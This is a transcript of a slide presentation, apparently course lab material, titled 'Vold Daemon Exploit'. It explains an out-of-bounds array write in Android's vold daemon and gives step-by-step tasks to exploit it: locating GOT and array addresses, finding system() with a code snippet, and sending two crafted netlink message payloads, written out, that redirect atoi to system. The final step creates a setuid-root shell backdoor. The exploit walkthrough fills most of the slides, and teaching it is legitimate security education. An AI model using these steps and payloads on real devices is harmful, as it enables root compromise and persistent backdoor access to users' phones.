findParam("MINOR"));       int part_num;     const char *tmp = evt->findParam("PARTN");     if (tmp) {         part_num = atoi(tmp);     } else {         SLOGW("Kernel block uevent missing 'PARTN'");         part_num = 1;     }     if (part_num > mDiskNumParts) {         mDiskNumParts = part_num;   ...     if (part_num > MAX_PARTITIONS) {         SLOGE("Dv:partAdd: ignoring part_num = %d (max: %d)\n", part_num, MAX_PARTITIONS);         mPartMinors[part_num -1] = minor;     --mPendingPartsCount; } what where"> findParam("MINOR"));       int part_num;     const char *tmp = evt->findParam("PARTN");     if (tmp) {         part_num = atoi(tmp);     } else {         SLOGW("Kernel block uevent missing 'PARTN'");         part_num = 1;     }     if (part_num > mDiskNumParts) {         mDiskNumParts = part_num;   ...     if (part_num > MAX_PARTITIONS) {         SLOGE("Dv:partAdd: ignoring part_num = %d (max: %d)\n", part_num, MAX_PARTITIONS);         mPartMinors[part_num -1] = minor;     --mPendingPartsCount; } what where">

Presentation is loading. Please wait.

Presentation is loading. Please wait.

Vold Daemon Exploit.

Published byCorey Simon Modified over 6 years ago

Similar presentations

Presentation on theme: "Vold Daemon Exploit."— Presentation transcript:

1 Vold Daemon Exploit

2 VOLD Daemon Vulnerability
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 void DirectVolume::handlePartitionAdded(const char *devpath, NetlinkEvent *evt) {     int major = atoi(evt->findParam("MAJOR"));     int minor = atoi(evt->findParam("MINOR"));     int part_num;     const char *tmp = evt->findParam("PARTN");     if (tmp) {         part_num = atoi(tmp);     } else {         SLOGW("Kernel block uevent missing 'PARTN'");         part_num = 1;     }     if (part_num > mDiskNumParts) {         mDiskNumParts = part_num;   ...     if (part_num > MAX_PARTITIONS) {         SLOGE("Dv:partAdd: ignoring part_num = %d (max: %d)\n", part_num, MAX_PARTITIONS);         mPartMinors[part_num -1] = minor;     --mPendingPartsCount; } what where

3 Memory Layout .text .data heap allocated data Volume { …,
int mPartMinors[] } top of stack < > main() local vars argc, **argv, **envp environment var’s .got Address 1 (fopen) Address 2 (atoi) void DirectVolume::handlePartitionAdded(const char *devpath, NetlinkEvent *evt) {     int major = atoi(evt->findParam("MAJOR"));     int minor = atoi(evt->findParam("MINOR"));     int part_num;     const char *tmp = evt->findParam("PARTN");     part_num = atoi(tmp);      ...     mPartMinors[part_num -1] = minor; ... }

4 Memory Layout .text .data heap allocated data Volume { …,
int mPartMinors[] } top of stack < > main() local vars argc, **argv, **envp environment var’s .got Address 1 (fopen) Address 2 (atoi) void DirectVolume::handlePartitionAdded(const char *devpath, NetlinkEvent *evt) {     int major = atoi(evt->findParam("MAJOR"));     int minor = atoi(evt->findParam("MINOR"));     int part_num;     const char *tmp = evt->findParam("PARTN");     part_num = atoi(tmp);      ...     mPartMinors[part_num -1] = minor; ... } Attacker controlled pointer.

5 Memory Layout .text .data heap allocated data Volume { …,
int mPartMinors[] } top of stack < > main() local vars argc, **argv, **envp environment var’s .got Address 1 (fopen) Address 2 (atoi) void DirectVolume::handlePartitionAdded(const char *devpath, NetlinkEvent *evt) {     int major = atoi(evt->findParam("MAJOR"));     int minor = atoi(evt->findParam("MINOR"));     int part_num;     const char *tmp = evt->findParam("PARTN");     part_num = atoi(tmp);      ...     mPartMinors[part_num -1] = minor; ... } Attacker controlled pointer. Attacker controlled content

6 Memory Layout Being called first with an attacker controlled String.
.text .data heap allocated data Volume { …, int mPartMinors[] } top of stack < > main() local vars argc, **argv, **envp environment var’s .got Address 1 (fopen) Address 2 (atoi) void DirectVolume::handlePartitionAdded(const char *devpath, NetlinkEvent *evt) {     int major = atoi(evt->findParam("MAJOR"));     int minor = atoi(evt->findParam("MINOR"));     int part_num;     const char *tmp = evt->findParam("PARTN");     part_num = atoi(tmp);      ...     mPartMinors[part_num -1] = minor; ... } Attacker controlled pointer. Attacker controlled content

7 Memory Layout Being called first with an attacker controlled String.
.text .data heap allocated data Volume { …, int mPartMinors[] } top of stack < > main() local vars argc, **argv, **envp environment var’s .got Address 1 (fopen) Address 2 (atoi) system void DirectVolume::handlePartitionAdded(const char *devpath, NetlinkEvent *evt) {     int major = atoi(evt->findParam("MAJOR"));     int minor = atoi(evt->findParam("MINOR"));     int part_num;     const char *tmp = evt->findParam("PARTN");     part_num = atoi(tmp);      ...     mPartMinors[part_num -1] = minor; ... } overwrite Attacker controlled content

8 Tasks Figure out GOT’s address Ag.
Figure out *mPartMinors pointers base address Am. Caculate offset between Am and Ag. Figure out address of system(). Craft an input to VOLD daemon to overwrite entries in GOT to point to system(). Craft another input to trigger overwrote method with desired command.

9 Task 1. GOT address Pull /system/bin/vold from emulator to the host machine. Execute following command on vold on the host machine to figure out GOT address. (This is for MAC OS. For linux or windows, you should use corresponding objdump in the NDK.) .text .data heap allocated data Volume { …, int mPartMinors[] } top of stack < > main() local vars argc, **argv, **envp environment var’s Address 1 (fopen) Address 2 (atoi) Address 3 (strcmp) .got 0x14368

10 Task 2. mPartMinors address
.text .data heap allocated data Volume { …, int mPartMinors[] } top of stack < > main() local vars argc, **argv, **envp environment var’s Address 1 (fopen) Address 2 (atoi) Address 3 (strcmp) find_pointer_address program require “android.permission.READ_LOGS” permission. So, before execute find_pointer_address, you should switch to user “log”: su log .got 0x14368 0x16208

11 Task 3. Calculate Offset .text Address 1 (fopen) Address 2 (atoi) .got
.data heap allocated data Volume { …, int mPartMinors[] } top of stack < > main() local vars argc, **argv, **envp environment var’s Address 1 (fopen) Address 2 (atoi) Address 3 (strcmp) .got 0x14368 Figure out by yourself. 0x16208

12 Task 4. system() address Put following code snippet into your program to get the system() method’s address. static void *find_system() { char *system = "system"; void *r = NULL; void *dlh = dlopen("/system/libc/libc.so", RTLD_NOW); if (!dlh) exit(errno); if ((r = (void *)dlsym(dlh, system)) == NULL) dlclose(dlh); return r; }

13 Task 5. Craft message 1 .text Address 1 (fopen) Address 2 (atoi)
.data heap allocated data Volume { …, int mPartMinors[] } top of stack < > main() local vars argc, **argv, **envp environment var’s Address 1 (fopen) Address 2 (atoi) Address 3 (strcmp) system .got 0x14368 Send msg1 to vold to overwrite GOT entry atoi to system. @/foo\x00ACTION=add\x00SUBSYSTEM=block\x00DEVPATH=/devices/platform/goldfish_mmc.0\x00MAJOR=179\x00MINOR=system_address\x00DEVTYPE=harder\x00PARTN=idx 0x16208

14 Task 6. Craft message 2 Send msg2 to trigger atoi in the code with command you want to execute. (atoi should be system now.) .text .data heap allocated data Volume { …, int mPartMinors[] } top of stack < > main() local vars argc, **argv, **envp environment var’s Address 1 (fopen) Address 2 (atoi) Address 3 (strcmp) system .got 0x14368 @/foo\x00ACTION=add\x00SUBSYSTEM=block\x00DEVPATH=/devices/platform/goldfish_mmc.0\x00MAJOR=command\x00MINOR=1\x00DEVTYPE=harder\x00PARTN=1 0x16208

15 Command could be a shell script to create backdoor
Copy /system/bin/sh to a local directory /data/local/tmp Remount /data partition. (mount –o remount,rw /dev/block/mtdblock1 /data) Change ownership of /data/local/tmp/sh to root.root Add setuid bit (chmod 4711). Backdoor done!

16 backup

17 class DirectVolume : public Volume {
    static const int MAX_PARTITIONS = 4; protected:     PathCollection *mPaths;     int            mDiskMajor;     int            mDiskMinor;     int            mPartMinors[MAX_PARTITIONS];     int            mDiskNumParts;     int            mPendingPartsCount;   ... };

Download ppt "Vold Daemon Exploit."

Similar presentations

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)
Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.

Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
What is a pointer? First of all, it is a variable, just like other variables you studied So it has type, storage etc. Difference: it can only store the.

What is a pointer? First of all, it is a variable, just like other variables you studied So it has type, storage etc. Difference: it can only store the.
Network Security Attack Analysis. cs490ns - cotter2 Outline Types of Attacks Vulnerabilities Exploited Network Attack Phases Attack Detection Tools.

Network Security Attack Analysis. cs490ns - cotter2 Outline Types of Attacks Vulnerabilities Exploited Network Attack Phases Attack Detection Tools.
Stack buffer overflow http://en.wikipedia.org/wiki/Stack_buffer_overflow.

Stack buffer overflow
Process in Unix, Linux and Windows CS-3013 C-term 20081 Processes in Unix, Linux, and Windows CS-3013 Operating Systems (Slides include materials from.

Process in Unix, Linux and Windows CS-3013 C-term Processes in Unix, Linux, and Windows CS-3013 Operating Systems (Slides include materials from.
CS-502 Fall 2006Processes in Unix, Linux, & Windows 1 Processes in Unix, Linux, and Windows CS502 Operating Systems.

CS-502 Fall 2006Processes in Unix, Linux, & Windows 1 Processes in Unix, Linux, and Windows CS502 Operating Systems.
Unix Process Environment. main Function A C program starts execution with a function called main. The prototype for the main function is: int main (int.

Unix Process Environment. main Function A C program starts execution with a function called main. The prototype for the main function is: int main (int.
Unix & Windows Processes 1 CS502 Spring 2006 Unix/Windows Processes.

Unix & Windows Processes 1 CS502 Spring 2006 Unix/Windows Processes.
Processes in Unix, Linux, and Windows CS-502 Fall 20071 Processes in Unix, Linux, and Windows CS502 Operating Systems (Slides include materials from Operating.

Processes in Unix, Linux, and Windows CS-502 Fall Processes in Unix, Linux, and Windows CS502 Operating Systems (Slides include materials from Operating.
Buffer Overflow Attacks. Memory plays a key part in many computer system functions. It’s a critical component to many internal operations. From mother.

Buffer Overflow Attacks. Memory plays a key part in many computer system functions. It’s a critical component to many internal operations. From mother.
Command line arguments. – main can take two arguments conventionally called argc and argv. – Information regarding command line arguments are passed to.

Command line arguments. – main can take two arguments conventionally called argc and argv. – Information regarding command line arguments are passed to.
University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.

University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.
Copyright 2013 – Noah Mendelsohn Process Memory Noah Mendelsohn Tufts University Web:

Copyright 2013 – Noah Mendelsohn Process Memory Noah Mendelsohn Tufts University Web:
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Process in Unix, Linux, and Windows CS-3013 A-term 20081 Processes in Unix, Linux, and Windows CS-3013 Operating Systems (Slides include materials from.

Process in Unix, Linux, and Windows CS-3013 A-term Processes in Unix, Linux, and Windows CS-3013 Operating Systems (Slides include materials from.
Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.

Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.
Buffer Overflows Lesson 14. Example of poor programming/errors Buffer Overflows result of poor programming practice use of functions such as gets and.

Buffer Overflows Lesson 14. Example of poor programming/errors Buffer Overflows result of poor programming practice use of functions such as gets and.
Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score.

Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score.
Exec Function calls Used to begin a processes execution. Accomplished by overwriting process imaged of caller with that of called. Several flavors, use.

Exec Function calls Used to begin a processes execution. Accomplished by overwriting process imaged of caller with that of called. Several flavors, use.

Similar presentations

Ads by Google